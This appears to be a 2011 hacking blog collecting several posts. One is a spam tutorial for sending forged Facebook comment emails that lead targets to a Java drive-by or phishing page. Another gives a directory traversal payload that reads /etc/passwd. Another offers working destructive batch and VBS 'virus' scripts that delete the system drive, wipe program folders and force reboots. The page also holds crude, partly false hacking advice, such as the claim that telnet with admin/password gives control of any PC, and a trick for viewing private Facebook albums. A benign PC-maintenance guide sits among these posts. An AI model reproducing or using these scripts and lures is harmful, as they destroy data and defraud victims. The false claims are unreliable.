Search This Blog

Sunday, February 6, 2011

How to view Private albums in Facebook !!!!!




How to view Private albums in Facebook !!!!!

View the Album of Any User Even if it is Private

Firstly You need to have GreaseMonkey Script(Works on Firefox,Opera and Internet Explorer)
You can download Greasemonkey here

Let Your Firefox Restart.
Now Go here

Press "INSTALL" Green color button on that page and install the script.
Navigate to any user's profile and Watch His private photos Ninja

How to Spam On Facebook (Earn Money)


How to Spam On Facebook (Earn Money)

Introduction
In this tutorial I will be showing you how to spread your file using a fake Facebook comment email. Basically your target gets an email that looks like it's from Facebook telling them someone commented on their staus. When they click to view the comment, it takes them to a URL of your choice, preferably set up with a Java drive-by (see below for screenshot).
This method requires Java drive-by to spread a file, which I will not be covering. It can just as easily be used to direct someone to a fake facebook website (phishing), which again I won't be covering here.

Why is this useful?
This can be useful if you want to spread your file to a specific person.
It can also be useful to get an automatic spreader working its magic among a certain group of people (ie. your facebook friends)

What do I need?
- Something at a URL of your choice (ie. a Java drive-by) - not covered here
- The full name of a friend of the person you are targeting
- The first name of the person you are targeting
- Windows (to run vbscript)
- Text editor - I use Notepad++
- SMTP server and account - ie if you use gmail you need a gmail account. I'd suggest creating one for this purpose.

Step 1
Firstly, you need two files - text file containing email body and a vbscript to send the email.

emailbody.txt - copy below and save as "emailbody.txt" (if you modify the name make sure to reflect this change in the vbscript)



<div class=WordSection1>

<table class=MsoNormalTable border=0 cellspacing=0 cellpadding=0 width=620
style='width:465.0pt;mso-cellspacing:0cm;mso-yfti-tbllook:1184;mso-padding-alt:
0cm 0cm 0cm 0cm'>
<tr style='mso-yfti-irow:0;mso-yfti-firstrow:yes'>
  <td style='background:#3B5998;padding:3.0pt 6.0pt 3.0pt 6.0pt'>
  <p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt;line-height:
  normal'><b><span style='font-size:12.0pt;font-family:"Tahoma","sans-serif";
  mso-fareast-font-family:"Times New Roman";color:white;letter-spacing:-.35pt;
  mso-fareast-language:EN-AU'><a
______________________________________________________________
sendemail.vbs - copy below text and save with "vbs" extension
Code:
Option Explicit

Call Email

Function Email
    Dim iMsg, iConf, Flds, schema

    Set iMsg = CreateObject("CDO.Message")
    Set iConf = CreateObject("CDO.Configuration")
    Set Flds = iConf.Fields
____________________________________________________________
Note: The html for the email body was created using MS Word's HTML conversion. I have taken out as much crap as I felt necessary. I have not cleaned it up as much as I could have as I didn't feel the need. The confusing code may actually be a good thing, given your intentions. Devlish

Step 2
You need to edit emailbody.txt. I'd suggest using 'find and replace' to make sure you get all instances.
These are variables in the file:

$RecipientFirstName - The first name of the person you are sending the email to
$FirstName - First name of person who COMMENTED on the above person's status
$FullName - Full name of person who COMMENTED on the recipient's status
$Comment - The comment made by the commenter ($Firstname)
$Email - Email address of the recipient (this is for the little link at the bottom of the email)
$URL - Address your java drive-by is located (or wherever you want)

Note: You may change other parts, for example change "$Fullname commented on your status." to "Fullname commented on [some_douche]'s status."

Step 3
You also need to edit sendemail.vbs. It's fairly sef-explanatory, but you need to provide the following:

SMTP server - currently set to smtp.gmail.com
Username - for above smtp server
Password - for above smtp server
Recipient's email
Email subject line - change $Fullname to the same as in step 2
emailbody.txt location - if not in the same directory as sendemail.vbs

Step 4
That's it! You are ready to run sendemail.vbs! I highly recommend testing the full process in a virtual machine! For example, send it to yourself, pretend to be your target and click links, make sure your drive-by works, etc.

Important
Please note that if using gmail's SMTP server, the 'from' email will NOT be the email they see. They will see the email of the gmail account you used. This is usually not displayed, for example in gmail you have to click 'Show Details' to see this info. I don't know if other SMTP servers do the same.

Conclusion
I hope you found this tutorial useful. Please give feedback and happy spreading :)

Saturday, February 5, 2011

what is direct transversel


directory traversal (or path traversal) is to exploit insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.
The goal of this attack is to order an application to access a computer file that is not intended to be accessible. This attack exploits a lack of security (the software is acting exactly as it is supposed to) as opposed to exploiting a bug in the code.
Directory traversal is also known as the ../ (dot dot slash) attack, directory climbing, and backtracking. Some forms of this attack are also canonicalization attacks.

how to use direct trnsversel?


<?php
$template = 'red.php';
if ( isset( $_COOKIE['TEMPLATE'] ) )
   $template = $_COOKIE['TEMPLATE'];
include ( "/home/users/phpguru/templates/" . $template );
?>
An attack against this system could be to send the following HTTP request:
GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd

Generating a server response such as:
HTTP/1.0 200 OK
Content-Type: text/html
Server: Apache

root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh 
daemon:*:1:1::/tmp: 
phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh
The repeated ../ characters after /home/users/phpguru/templates/ has caused include() to traverse to the root directory, and then include the UNIX password file /etc/passwd.
UNIX /etc/passwd is a common file used to demonstrate directory traversal, as it is often used by crackers to try cracking the passwords.
However, in more recent UNIX systems, the passwd file does not contain the hashed passwords. They are, instead, located in the shadow file which cannot be read by unprivileged users on the machine. It is however, still useful for account enumeration on the machine, as still displays the usernames on the box

how Can I hack this


Well, I made this as I have had moments where i have looked a website and have thought, 'hmm, how could I hack this'. I compiled this list of information and methods not only to help myself, but to help others alike. I didn't really go into to much detail, that's for you to do, this is just the basic concept and methods to choose from.
Please post if you have any methods that I may have missed out. Black Hat

Protect your PC and make it fast!


Protect your PC and make it fast!


Is your computer running running slow or do you think you are infected? If yes than this thread is for you!


First you must learn to differentiate between an infection and just general computer slowness.

Symptoms of Infection
There are a number of symptoms which indicate that your computer has been infected. If you notice "strange things" happening to your computer, namely:
  • unexpected messages or images are suddenly displayed
  • unusual sounds or music played at random
  • your CD-ROM drive mysteriously opens and closes
  • programs suddenly start on your computer
  • you receive notification from your firewall that some applications have attempted to connect to the Internet, although you did not initiate this, then it is very likely that your computer has been infected by a virus.

Additionally, there are some typical symptoms which indicate that your computer has been infected via email:
  • your friends mention that they have received messages from your address which you know you did not send
  • your mailbox contains a lot of messages without a sender's e-mail address or message header.

These problems, however, may not be caused by viruses. For example, infected messages that are supposedly coming from your address can actually be sent from a different computer.

There is a range of secondary symptoms which indicate that your computer may be infected:
  • your computer freezes frequently or encounters errors
  • your computer slows down when programs are started
  • the operating system is unable to load
  • files and folders have been deleted or their content has changed
  • your hard drive is accessed too often (the light on your main unit flashes rapidly)
  • Microsoft Internet Explorer freezes or functions erratically e.g. you cannot close the application window
Reference: http://www.viruslist.com/en/viruses/ency...=153280800

NOTE: Paranoia is not a symptom of infection!



What to do if your Computer is Running Slow

Content taken and edited from malwareremoval.com

Computers need regular maintenance, I know this comes as a shock to some of you, but it's true nonetheless.

It's best if we break things down into two sections, the first are those that should be done regularly, the next are those that only need to be done once, or very infrequently.

1. Tasks that need to be carried out regularly.
  • Clean out Temp files
During the normal operation of your computer, Windows and your other programmes create an awful lot of temporary files. For the most part they are just that, temporary. But for any number of reasons, when they're no longer needed they don't get removed by the programme that created them. So over time their number builds up, and unless you clear them out they can slow down your computer noticeably.

In the case of your Browser, the problem can be worse. All browsers cache the web pages you visit. The original reason was to make loading pages faster. When everyone was on dial-up this was quite a good idea, but with modern fast connections it's mostly unecessary now. However browsers still cache webpages, and unless cleaned out regularly they build up to a position where they can have some pretty dramatic effects on how your browser works. Any number of wierd browser problems are caused by nothing more than an overfull cache.

So once a month, or once a week if you're a heavy user, it's a good idea to clean out your Temporary files.

To clean out temp files:

A good program to run regularly is CCleaner.
  • Download CCleaner from here
  • Double click on ccsetupXXX_slim.exe to start the installation of CCleaner. (XXX is the version number)
  • Click OK
  • Click Next
  • Click I agree
  • Click Next
  • Click Install
  • Once the installation has finished, click Finish

Open CCleaner if it's not already running.
  • Select Cleaner Settings.
    Check Internet Explorer, Windows Explorer, and System so that all items are checked. Then under Internet Explorer, Uncheck "History". In the Advanced section, have a check only on Old PreFetch Data.
  • Click on the Options block on the left. Select Advanced.
    Check Only delete files in Windows Temp folders older than 48 hours.
  • Set CCleaner to Run When Computer Starts. Click on the Options block on the left, then choose Settings. Check Run CCleaner when computer starts.


  • Defrag your Hard Drive

Every time you write a file to your Hard Drive, the drive controller has to find space on your drive. It will often break files into fragments, so that it can use the available disk space efficiently. However over time files can become very fragmented because of this, and your drive controller has to work harder to find all the fragments and re-combine them so that a programme can use it. This slows things down, depending on the amount of fragmentation of your files, it can slow things down a lot.

So once a month (for heavy users), or once every 3 or 4 months (for light users), it's a good idea to defragment your hard drive.

This will re-arrange the fragments on your drive so they form contiguous entities which are much easier for your drive controller to deal with.

It's a time consuming operation, usually taking several hours, so best to do what I do, and start it going before you go to bed.


To defrag your hard drive:
  • Click Start
  • Run
  • Type: Dfrg.msc and click ok.
  • Select your main Drive or "Volume" (usually C)
  • Click Defragment
This may take a while so as said previously, best to leave running over night. Once it has completed, repeat the procedure on any other drives you have on-board.


2. Tasks that don't need to be carried out so often.
  • Reduce the number of Start Up programs.

Pretty much every programme you install these days is set to auto start when you boot up. The programme manufacturers tell you it's for your benefit, but the truth is for most of them it's just not necessary that they do so. Lots of auto starting programmes will severely slow down your startup time, and having lots of unecessary programmes running in memory will slow down the running speed of your computer as well.

Luckily it's not hard to prevent unecessary programmes from auto starting. Doing so does not mean you can't use the programmes, you start them by double clicking on their icons, just as you always have, it just means they won't be running when you're not using them.

Of course programmes like your Firewall and Anti-Virus need to auto run, so we won't be touching them at all.

To remove programs from startup:
  • Download StartupLite by Rubberducky to your Desktop.
  • Doubleclick StartupLite.exe to launch the programme.
  • Ensure the Disable box is checked.
  • Click Continue.
  • A pop up message will tell you the unecessary startup items in your list have been disabled and ask you to restart your computer.
  • Re-start your computer.

  • Check the amount of free space you have on your Hard Drive.

Windows (XP and Vista) needs a certain amount of "overhead" (free disk space) if it's to operate efficiently. If it doesn't have that space, your processor has to "page out", which will slow everything down considerably.

Ideally you need at least 15-20% of your disk to be empty, if you don't have 15% then it's time to start freeing up some disk space.

To check your free disk space:

For users of XP
  • Click Start All Programs > Accessories System Tools Disk Defragmenter
  • Look in the last column (top right) under % Free Space
  • Exit Disk Defragmenter


For users of Vista
  • Click Start Computer
  • A window will open
  • Information for your Hard disk drive(s), including the exact amount of free space available, will be displayed in the uppermost portion of the window.


Presuming you don't have enough free disk space, here's a couple of suggestions for freeing some up

  • Remove unecessary programmes.
OK, time to be honest with youself, are you really using all those programmes you've got installed, or are there some that you haven't used in a lifetime. If there are, then why not get rid of them and free up some disk space. Your hard drive will thank you for your efforts.

To remove unwanted/unused programs:


For users of XP
  • Click Start Control Panel > Add or Remove Programs
  • Click on the programme you want to remove to highlight it.
  • Click the Change/Remove button and follow any instructions given.
  • Repeat for all programmes you wish to remove.



For users of Vista
  • For Control Panel Home view - Click Start Control Panel Programs Programs and Features
  • For Classic View - Click Start Control Panel > Programs and Features
  • For either option, to uninstall a program, select it from the list and then click Uninstall.

  • Reduce your System Restore Points.

Windows creates System Restore points on a regular basis (every 24 hours), they take up a great deal of space on your hard drive (upto 12% for XP, 15% for Vista). If your computer has been running without problems (other than the slowness) for some time, then you can free up a lot of space by reducing the number of System Restore points to one (the latest).

Windows will continue creating more RPs, but it'll take some time before you need to thin them out again.

To reduce the number of System Restore points:


For users of XP
  • Click Start > All Programs > Accessories > System Tools > Disk Cleanup
  • This will bring up the Disk Cleanup window.
  • Click the More Options tab.
    • In the System Restore field, click Clean up
    • You will be prompted if you want to remove all but the most recent Restore Point.
    • Click Yes.
  • Click OK.
  • When prompted whether you're sure you want to do this click Yes.




For users of Vista
  • Click Start > All Programs > System Tools > Disk Cleanup
  • Select Files from all users on this computer
  • Click on Continue
  • Select the appropriate drive letter (usually C:)
  • When the Disk Cleanup window opens, select the More Options tab
  • Under System Restore and Shadow Copies click on the Clean up button
  • All but the latest restore point will be removed
    • Note: In some editions of Windows Vista, the disc might include file shadow copies and older Windows Complete PC Backup images as part of restore points. This information will also be deleted.

Virus Scripts (How to create a Virus)

Good morning , today i will be teaching all of you "How to Create a Virus"
so 1st of all i want to tell you that,These viruses are not Spywares , All they do is Harm The victims  Computer. Thats all , I played With These codings when i was too young



Below Given , is the  Virus Codings Which need to be copied in NotePad , and needed to be Saved as The Extension give below in every coding !




This Virus Deletes Everything from Your system Drive



@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Note:Save The Above Code As Anything.bat


This is A simple virus Which will Be Restarting you PC


@echo off
shutdown -r -f -t 00

Note: The Above Code Will Just Restart Ur PC
Note:save it as anything.bat

This Virus is Very a Cool Virus


Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
Note:Save It As Anything.vbs
Note:It Only Works With Windows XP



The most Dangerous 1 :-D



echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* nul >>c:\autoexec.bat
echo copy c:\******s\command\forma.com c:\ >nul >>c:\autoexe.bat
echo copy c:\******s\command/deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltre /y c:\******s\*.* >nul >>c:\autoexec.bat
echoformat c:/q /u /autotest >nul >>c:\autoexe.bat

Note:Save It As Anything.bat


Just 2 Lines to Crush the Windows



@Echo off
Del C:\ *.* |y
Note:Save It As Anything.bat

The basic concepts of Hacking

this is for all people who think Hacking is a "magic, mystery,and all that Blah Blah Blah"

1st) The basic thing is ,What you Want to hack ?
ans)Be clear, What you want to hack ? A computer , a website , a Email Id e.t.c


Hacking a Computer 
so you want to hack your friend's or a strangers PC , 1st thing , For that you need to have the IP address of that
PC or you need to Create a Virus and then inject it into his PC (Victim's PC)
So the basic questions comes out are :-
1.)How do i create a virus ? Don't worry there are many Softwares like "Trojan creators" and all.
2.)I have the IP address now what?if you have the ip address you need to make a dos attack
open ms Dos , Type "telnet" "IPaddress" it will ask id password
Then In id type:"admin"
and in Password type :"password"
then you will be logged in into his computer , and you will be having full control on the computer.


Hacking a Website
So you need to hack a Website , Change its content and Show the World that you Hacked it & its Vulnerable.
let me tell you something
1.)only vulnerable sites can be hacked .
2.)every site is Vulnerable , and can be hacked by some methods.
Ok, Now what , Just teach me How to hack websites? So there are many Methods To hack Websites
Let me Tell you some Of the methods .
1.)Sql Injection -A method by Which we can get the ID  Password of  the Website's  Admin Panel .
2.)Cross Site Scripting -Also known as XSS , A method by which we can Run some Malicious Scripts On the Website , It can do many things like :- Steal cookie , redirect to hacker's page , etc



Hacking an email-id
email can be hacked by many methods
1.)phishing - by making a login page same as email login and getting the victims email id & and password by making him sign in from your fake login page.
2.)cookie stealing - stealing the cookie and then using it to login from victims account.